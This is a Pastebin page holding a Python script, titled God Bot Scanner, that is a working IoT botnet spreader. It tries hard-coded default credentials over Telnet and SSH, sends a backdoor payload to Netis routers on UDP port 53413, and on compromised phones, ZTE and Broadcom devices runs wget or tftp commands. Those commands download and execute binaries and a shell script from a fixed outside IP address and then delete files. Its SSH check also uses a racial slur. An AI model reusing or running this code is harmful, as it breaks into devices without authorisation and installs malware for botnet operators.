API tools faq
paste
mysql_Anarchy

[ PYTHON ] God Bot Scanner (SSH, TELNET, NETIS, PHONES)

mysql_Anarchy
Jun 4th, 2018
1,274
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 8.06 KB | None | 0 0
raw download clone embed print report
  1. import threading, sys, time, random, socket, re, os, paramiko
  2. from Queue import *
  3. from sys import stdout
  4.  
  5. if len(sys.argv) < 3:
  6.         print "Usage: python "+sys.argv[0]+" <threads> <list>"
  7.         sys.exit()
  8.  
  9. # USER AND PASS LISTS #
  10. usernames = ["root", "admin", "root", "root"] #DONT CHANGE
  11. passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
  12. ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
  13. loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  14.  
  15.  
  16. # START CONFIGURATION #
  17. url = "http://103.194.169.245/tftp" # ARM4 Binary
  18. sh_file = "http://103.194.169.245/bins.sh" # SH File
  19. commandpayload = "AA\x00\x00AAAA cd /var/; rm -rf sshd; wget http://103.194.169.245/sshd || tftp -r sshd -g 103.194.169.245; chmod 777 sshd; ./sshd; rm -rf sshd\x00" # MIPSEL Binary
  20.  
  21. # DONT TOUCH
  22. spawn_shell = "cat | sh"
  23. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  24. threads = int(sys.argv[1])
  25. ips = open(sys.argv[2], "r").readlines()
  26. ports = ["23", "22", "53413"]
  27. queue = Queue()
  28. qcount = 0
  29. binary = url.split("/")
  30. binary = binary[3]
  31. ip = binary[2]
  32. found = 0
  33. count = 0
  34.  
  35. for ip in ips:
  36.     qcount += 1
  37.     stdout.write("\r[%d] Added to queue" % qcount)
  38.     stdout.flush()
  39.     queue.put(ip)
  40. print "\n"
  41.  
  42. def readUntil(tn, string, timeout=10):
  43.     buf = ''
  44.     start_time = time.time()
  45.     while time.time() - start_time < timeout:
  46.         buf += tn.recv(1024)
  47.         time.sleep(0.01)
  48.         if string in buf: return buf
  49.     raise Exception('TIMEOUT!')
  50.  
  51. def worker():
  52.     try:
  53.         while True:
  54.             try:
  55.                 if queue.empty() == True:
  56.                     sys.exit(1)
  57.                 ip = queue.get()
  58.                 ss = sssh(ip)
  59.                 ss.start()
  60.                 tt = ttelnet(ip)
  61.                 tt.start()
  62.                 nn = nnetis(ip)
  63.                 nn.start()
  64.                 queue.task_done()
  65.             except:
  66.                 pass
  67.     except:
  68.         pass
  69.  
  70. class ttelnet(threading.Thread):
  71.         def __init__ (self, ip):
  72.             threading.Thread.__init__(self)
  73.             self.ip = str(ip).rstrip('\n')
  74.         def run(self):
  75.             try:
  76.                 tn = socket.socket()
  77.                 tn.settimeout(5)
  78.                 tn.connect((self.ip,23))
  79.                 time.sleep(0.2)
  80.                 hoho = ''
  81.                 hoho += readUntil(tn, ":")
  82.                 if "mdm9625" in hoho:
  83.                     r00t = 0
  84.                     username = usernames[1]
  85.                     password = passwords[1]
  86.                     tn.send(username + "\n")
  87.                 elif "9615-cdp" in hoho:
  88.                     r00t = 1
  89.                     username = usernames[0]
  90.                     password = passwords[0]
  91.                     tn.send(username + "\n")
  92.                 elif "ogin" in hoho and "9615-cdp" not in hoho:
  93.                     zte = 1
  94.                     username = usernames[2]
  95.                     password = passwords[2]
  96.                     tn.send(username + "\n")
  97.                 elif "ogin" in hoho and "mdm9625" not in hoho:
  98.                     zte = 1
  99.                     username = usernames[2]
  100.                     password = passwords[2]
  101.                     tn.send(username + "\n")
  102.                 if "(none)" in hoho:
  103.                     zte = 0
  104.                     vizxv = 1
  105.                     username = usernames[3]
  106.                     password = passwords[3]
  107.                     tn.send(username + "\n")
  108.                 if "BCM" in hoho:
  109.                     zte = 0
  110.                     vizxv = 0
  111.                     BCM = 1
  112.                     username = usernames[1]
  113.                     password = passwords[1]
  114.                     tn.send(username + "\n")
  115.             except Exception:
  116.                 tn.close()
  117.             try:
  118.                 hoho = ''
  119.                 hoho += readUntil(tn, ":")
  120.                 if "assword" in hoho:
  121.                     tn.send(password + "\n")
  122.                     time.sleep(3)
  123.             except Exception:
  124.                 tn.close()
  125.             try:
  126.                 mp = ''
  127.                 mp += tn.recv(1024)
  128.                 if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  129.                     if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  130.                     if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  131.                     if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  132.                     if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  133.                     if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  134.                     found += 1
  135.             except Exception:
  136.                 tn.close()
  137.                 pass
  138.  
  139. class nnetis(threading.Thread):
  140.         def __init__ (self, ip):
  141.                 threading.Thread.__init__(self)
  142.                 self.ip = str(ip).rstrip('\n')
  143.         def run(self):
  144.                 s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  145.                 try:
  146.                         # sends netis payload to almost everything lmao
  147.                         s.sendto(loginpayload, (self.ip, 53413))
  148.                         time.sleep(1)
  149.                         s.sendto(commandpayload, (self.ip, 53413))
  150.                         time.sleep(2)
  151.                 except Exception:
  152.                         pass
  153.  
  154. class sssh(threading.Thread):
  155.     def __init__ (self, ip):
  156.         threading.Thread.__init__(self)
  157.         self.ip = str(ip).rstrip('\n')
  158.     def run(self):
  159.         x = 1
  160.         while x != 0:
  161.             try:
  162.                 username='root'
  163.                 password="0"
  164.                 port = 22
  165.                 ssh = paramiko.SSHClient()
  166.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  167.                 dobreak=False
  168.                 for passwd in ssh_passwords:
  169.                     if ":n/a" in passwd:
  170.                         password=""
  171.                     else:
  172.                         password=passwd.split(":")[1]
  173.                     if "n/a:" in passwd:
  174.                         username=""
  175.                     else:
  176.                         username=passwd.split(":")[0]
  177.                     try:
  178.                         ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  179.                         dobreak=True
  180.                         break
  181.                     except:
  182.                         pass
  183.                     if True == dobreak:
  184.                         break
  185.                 badserver=True
  186.                 stdin, stdout, stderr = ssh.exec_command("echo nigger")
  187.                 output = stdout.read()
  188.                 if "nigger" in output:
  189.                     badserver=False
  190.                 if badserver == False:
  191.                     print "\033[36m[SSH] command sent %s!\033[37m"%(self.ip)
  192.                     ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
  193.                     time.sleep(3)
  194.                     ssh.close()
  195.                 if badserver == True:
  196.                     ssh.close()
  197.             except:
  198.                 pass
  199.             x = 0
  200.  
  201. for g in xrange(threads):
  202.     t = threading.Thread(target=worker)
  203.     t.setDaemon(True)
  204.     t.start()
  205.    
  206. queue.join()
  207. print "Finished!"
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!